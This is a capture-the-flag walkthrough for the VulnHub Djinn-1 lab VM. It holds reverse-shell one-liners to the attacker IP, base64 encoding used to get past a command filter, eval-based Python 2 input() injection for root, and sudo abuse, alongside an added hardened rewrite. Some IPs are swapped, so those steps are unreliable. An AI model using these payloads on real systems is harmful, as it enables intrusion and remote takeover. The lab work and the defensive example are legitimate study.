Download: https://download.vulnhub.com/djinn/djinn.ova
Attacker IP: 192.168.56.132, bridged (automatic), VMware. Victim IP: 192.168.56.134, host-only, VirtualBox.
References: https://mp.weixin.qq.com/s/IxDe4VFW9iFB0LsfYQZmjA
https://www.cnblogs.com/haohao1/p/16031123.html
Host discovery: arp-scan -l
Port scan: nmap -p- -sV 192.168.56.134
Port 21 (FTP) is open; try an anonymous login with anonymous/anonymous
Alternatively, nmap -p- -A 192.168.56.134 detects the anonymous login directly
The hint says 1000 questions have to be answered
Directory scanning
dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://192.168.56.134:7331
gobuster dir -u http://192.168.0.106:7331 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
A command entered at http://192.168.56.134:7331/wish redirects to
http://192.168.56.134:7331/genie?name=www-data%0A, and the command output is echoed in the URL
Tried a reverse shell, but it turns out to be filtered
/bin/sh -i >& /dev/tcp/192.168.56.132/1111 0>&1
echo is allowed, so try encoding the command to get past the filter
echo "Y2F0IC9ldGMvcGFzc3dkCg==" | base64 -d | bash
bash -i >& /dev/tcp/192.168.56.132/1111 0>&1
base64-encoded:
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEzMi8xMTExIDA+JjE=
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEzMi8xMTExIDA+JjE=" | base64 -d | bash
Reverse shell established
Method 2: the 1337 game script
According to the hint, a gift is handed out after answering 1000 questions; typing them by hand is not realistic, so a script does it
# coding:utf-8
# Automates the 1337 "maths game": read each question, compute the answer,
# send it back, and return the server's final message after 1000+ rounds.
import logging
import re
import telnetlib
import time


def calc(res):
    # The question arrives as a tuple such as (12, '+', 7): strip the
    # brackets and quotes, rebuild the expression and evaluate it
    res_str = res.strip('(').strip(')').replace("'", "")
    nums = res_str.split(',')
    number1 = nums[0].strip()
    op = nums[1].strip()
    number2 = nums[2].strip()
    return eval(number1 + op + number2)


def main():
    try:
        tn = telnetlib.Telnet('192.168.56.134', port=1337)
    except Exception:
        logging.warning("errr")
        return None
    time.sleep(0.5)
    loop = 1
    while loop < 1002:
        data = tn.read_very_eager().decode('ascii')
        print(data)
        # Everything before the "> " prompt is the question
        res = re.search(r'(.*?)\s>', data).group(1)
        datas = str(calc(res)).strip()
        print(str(loop) + ":" + datas)
        loop = loop + 1
        tn.write(datas.encode('ascii') + b"\n")
        time.sleep(0.1)
    data = tn.read_very_eager().decode('ascii')
    return data


print(main())
python3 game.py
The game returns the hint 1356, 6784, 3409
Use knock to hit ports 1356, 6784 and 3409 in that order; this changes the firewall rules
knockd knock 192.168.56.132 1356 6784 3409
The target's SSH service is now reachable
nmap -p 22 -sV 192.168.56.132
Users found:
nitish sam
Looking through the files turns up a txt file
nitish:p4ssw0rdStr3r0n9
The txt contents are probably nitish's password
Running su directly fails:
su nitish
su: must be run from a terminal
The shell first has to be upgraded to a proper tty
python -c 'import pty; pty.spawn("/bin/bash")'
Privilege escalation
sudo -l
sudo -l shows that commands can be run as sam without a password
man genie shows the details of the command
It has -p and -cmd options
-p fails; sudo -u sam /usr/bin/genie -cmd whoami succeeds
After switching to sam, /root/lago can be executed as root
sudo -u root /root/lago
find / -writable -type f 2>/dev/null
Transfer the file to Kali
nc -lvnp 2222 > 666.pyc
nc 192.168.56.132 2222 < .pyc
Decompiling it with https://tool.lu/pyc/ gives the following source:
#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 2.7
from getpass import getuser
from os import system
from random import randint


def naughtyboi():
    print "Working on it!! "


def guessit():
    num = randint(1, 101)
    print "Choose a number between 1 to 100: "
    s = input("Enter your number: ")
    if s == num:
        system("/bin/sh")
    else:
        print "Better Luck next time"


def readfiles():
    user = getuser()
    path = input("Enter the full of the file to read: ")
    print "User %s is not allowed to read %s" % (user, path)


def options():
    print "What do you want to do ?"
    print "1 - Be naughty"
    print "2 - Guess the number"
    print "3 - Read some damn files"
    print "4 - Work"
    choice = int(input("Enter your choice: "))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print "work your ass off!!"
    else:
        print "Do something better with your life"


if __name__ == "__main__":
    main(options())
A closer audit shows that the program uses input() and is Python 2 code. Searching for "python input() vulnerability" turns up the known weakness of Python 2's input(); reference:
https://www.geeksforgeeks.org/vulnerability-input-function-python-2-x/
In Python 2, input() evaluates the typed text as an expression instead of returning it as a string, so a variable name typed at the prompt resolves to that variable's value. guessit() runs /bin/sh when s equals num, so entering num in "Guess the number" makes the comparison true. Since lago runs as root via sudo, entering num yields a root shell.
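As an added example (not from the original writeup or the Djinn VM), the decision logic of guessit() is rebuilt in Python 3 with Python 2's input() semantics emulated, beside a hardened version that treats the reply as data; py2_input, guess_vulnerable and guess_hardened are names chosen here.

```python
"""Python 2 input() weakness in lago's guessit(), beside a hardened rewrite.

Added example, not part of the original writeup. The game logic is rebuilt
from the decompiled source quoted above; helper names (py2_input,
guess_vulnerable, guess_hardened) are this example's own.
"""
import random


def py2_input(text, frame_locals):
    # Emulates Python 2's input(), which is eval(raw_input()) evaluated in the
    # caller's scope, so typed text can name local variables such as num.
    # Builtins are stripped: this only reproduces the name-lookup behaviour.
    return eval(text, {"__builtins__": {}}, frame_locals)


def guess_vulnerable(user_text, num=None):
    """Decision logic of lago's guessit(); system("/bin/sh") is replaced by a
    return value. True means lago would have spawned the shell."""
    if num is None:
        num = random.randint(1, 101)  # as in lago (note: 101 is reachable)
    s = py2_input(user_text, {"num": num})
    return s == num


def guess_hardened(user_text, num=None):
    """Same game with the reply treated as data: parse an integer, reject
    anything else and never evaluate the text."""
    if num is None:
        num = random.randint(1, 100)
    try:
        s = int(user_text.strip())
    except ValueError:
        return False
    if not 1 <= s <= 100:
        return False
    return s == num


if __name__ == "__main__":
    secret = 42
    print("py2-style, typed 'num':", guess_vulnerable("num", secret))
    print("py2-style, typed '7':  ", guess_vulnerable("7", secret))
    print("hardened,  typed 'num':", guess_hardened("num", secret))
    print("hardened,  typed '42': ", guess_hardened("42", secret))
```

The same fix applies to options() and readfiles(): in Python 2 use raw_input() (or int(raw_input())), never input(), wherever the text comes from an untrusted user.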
Privilege escalation succeeded
Privilege escalation, method 2
eval('__import__("os").system("whoami")')
bash -i >& /dev/tcp/192.168.56.132/2222 0>&1
eval('__import__("os").system("bash -i >& /dev/tcp/192.168.56.132/2222 0>&1")')
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEzMi8yMjIyIDA+JjE=
eval('__import__("os").system("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEzMi8yMjIyIDA+JjE= | base64 -d | bash")')
Originally published on the WeChat official account 王之暴龙战神: Djinn-1